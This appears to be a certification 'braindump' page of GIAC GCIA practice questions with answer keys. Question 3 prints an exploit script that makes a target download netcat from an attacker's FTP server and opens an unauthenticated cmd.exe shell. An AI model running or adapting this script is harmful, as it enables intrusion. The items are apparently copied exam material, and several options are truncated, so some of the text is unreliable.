GCIA | All About High Value GCIA Braindumps

Actualtests GCIA Questions are updated and all GCIA answers are verified by experts. Once you have completely prepared with our GCIA exam prep kits you will be ready for the real GCIA exam without a problem. We have Up to date GIAC GCIA dumps study guide. PASSED GCIA First attempt! Here What I Did.

GIAC GCIA Free Dumps Questions Online, Read and Test Now.

NEW QUESTION 1
Which of the following sectors on a hard disk contains codes that the computer uses to start the system?

  • A. Sector 256
  • B. Sector 0
  • C. Sector 1
  • D. Sector 128

Answer: B

NEW QUESTION 2
Mark works as a Network Security Administrator for BlueWells Inc. The company has a Windowsbased network. Mark is giving a presentation on Network security threats to the newly recruited employees of the company. His presentation is about the External threats that the company recently faced in the past. Which of the following statements are true about external threats?
Each correct answer represents a complete solution. Choose three.

  • A. These are the threats that originate from outside an organization in which the attacker attempts to gain unauthorized acces
  • B. These are the threats that originate from within the organizatio
  • C. These are the threats intended to flood a network with large volumes of access request
  • D. These threats can be countered by implementing security controls on the perimeters of the network, such as firewalls, which limit user access to the Interne

Answer: ACD

NEW QUESTION 3
Adam, a malicious hacker performs an exploit, which is given below:
#################################################################
$port = 53;
# Spawn cmd.exe on port X
$your = "192.168.1.1";# Your FTP Server 89
$user = "Anonymous";# login as
$pass = 'noone@nowhere.com';# password
#################################################################
$host = $ARGV[0];
print "Starting ...\n";
print "Server will download the file nc.exe from $your FTP server.\n"; system("perl msadc.pl -h $host -C \"echo
open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo $pass>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo bin>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo get hacked. html>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo quit>>sasfile\"");
print "Server is downloading ... \n";
system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\"");
print "Press ENTER when
download is finished ...
(Have a ftp server)\n";
$o=; print "Opening ...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n";
#system("telnet $host $port"); exit(0);
Which of the following is the expected result of the above exploit?

  • A. Creates a share called "sasfile" on the target system
  • B. Opens up a SMTP server that requires no username or password
  • C. Creates an FTP server with write permissions enabled
  • D. Opens up a telnet listener that requires no username or password

Answer: D

NEW QUESTION 4
Which of the following image file formats uses a lossy data compression technique?

  • A. GIF
  • B. JPG
  • C. PNG
  • D. TIF

Answer: B

NEW QUESTION 5
What is the function of TRACERT utility?

  • A. Trace the path taken by TCP/IP packets to a remote compute
  • B. Provide the host name of the routing devic
  • C. Trace the MAC address of the target host's network adapte
  • D. Provide DNS server addres

Answer: A

NEW QUESTION 6
Which of the following can be monitored by using the host-based intrusion detection system (HIDS)?

  • A. Computer performance
  • B. File system integrity
  • C. Computer storage space
  • D. DoS attack

Answer: B

NEW QUESTION 7
Which of the following is a correct sequence of different layers of Open System Interconnection (OSI) model?

  • A. Physical layer, data link layer, network layer, transport layer, session layer, presentation layer, and application layer
  • B. Physical layer, data link layer, network layer, transport layer, presentation layer, session layer, and application layer
  • C. application layer, presentation layer, network layer, transport layer, session layer, data link layer, and physical layer
  • D. Physical layer, network layer, transport layer, data link layer, session layer, presentation layer, and application layer

Answer: A

NEW QUESTION 8
You work as a System Administrator for McNeil Inc. The company has a Linux-based network. You are a root user on the Red Hat operating system. Your network is configured for IPv6 IP addressing. Which of the following commands will you use to test TCP/IP connectivity?

  • A. ping6
  • B. ifconfig
  • C. traceroute
  • D. ping

Answer: A

NEW QUESTION 9
You work as a Network Administrator for NetTech Inc. The company has a Windows Server 2008 domain-based network. The network contains Windows Server 2008 based two-node Network Load Balancing (NLB) cluster named Info.nettech.com. The cluster is implemented for high availability and load balancing for the company's intranet Web site. You find that the users can see the Network Load Balancing (NLB) cluster on the network neighborhood. The users are able to connect to various services by using the Info.nettech.com. The cluster is configured with the one port rule that equally balances all TCP/IP traffic across the cluster nodes. You want to configure the cluster to accept only HTTP traffic. What will you do to accomplish the task?
Each correct answer represents a part of the solution. Choose two.

  • A. Create a new port rule to allow TCP port 110.
  • B. Reconfigure the Network Load Balancing (NLB) cluste
  • C. Delete the default port rules by using Network Load Balancing cluster consol
  • D. Create a new port rule to allow TCP port 80.

Answer: CD

NEW QUESTION 10
Which of the following utilities can generate a local static route table?
Each correct answer represents a complete solution. Choose two.

  • A. ROUTE
  • B. PING
  • C. NETSTAT
  • D. TRACERT
  • E. NBTSTAT

Answer: AC

NEW QUESTION 11
What is the name of the first computer virus that infected the boot sector of the MS-DOS operating system?

  • A. Stoner
  • B. Code Red
  • C. Brain
  • D. Sircam

Answer: C

NEW QUESTION 12
Which of the following tools can be used to check whether the network interface is in promiscuous mode or not?

  • A. IPTraf
  • B. MRTG
  • C. Chkrootkit
  • D. Ntop

Answer: C

NEW QUESTION 13
You work as a Network Administrator for Infonet Inc. The company has a Windows Server 2008 domain-based network. The network has three Windows Server 2008 member servers and 150 Windows Vista client computers. The network contains a Windows Server 2008 Core computer. You want to install the DNS server role on the Windows Server 2008 Core computer. Which of the following commands will you use to accomplish the task?

  • A. start /w ocsetup DnsServercorerole
  • B. net start "dns server"
  • C. start /w ocsetup DNS-Server-Core-Role
  • D. start /w ocsetup DnsServer

Answer: C

NEW QUESTION 14
Which of the following command-line utilities is used to show the state of current TCP/IP connections?

  • A. PING
  • B. TRACERT
  • C. NETSTAT
  • D. NSLOOKUP

Answer: C

NEW QUESTION 15
Which of the following is an exact duplicate of computer's hard drive?

  • A. system image
  • B. bit-stream image
  • C. data image
  • D. drive image

Answer: B

NEW QUESTION 16
Adam works as a Computer Hacking Forensic Investigator in a law firm. He has been assigned with his first project. Adam collected all required evidences and clues. He is now required to write an investigative report to present before court for further prosecution of the case. He needs guidelines to write an investigative report for expressing an opinion. Which of the following are the guidelines to write an investigative report in an efficient way?
Each correct answer represents a complete solution. Choose all that apply.

  • A. All ideas present in the investigative report should flow logically from facts to conclusion
  • B. Opinion of a lay witness should be included in the investigative repor
  • C. The investigative report should be understandable by any reade
  • D. There should not be any assumptions made about any facts while writing the investigative repor

Answer: ACD

NEW QUESTION 17
......

Thanks for reading the newest GCIA exam dumps! We recommend you to try the PREMIUM 2passeasy GCIA dumps in VCE and PDF here: https://www.2passeasy.com/dumps/GCIA/ (508 Q&As Dumps)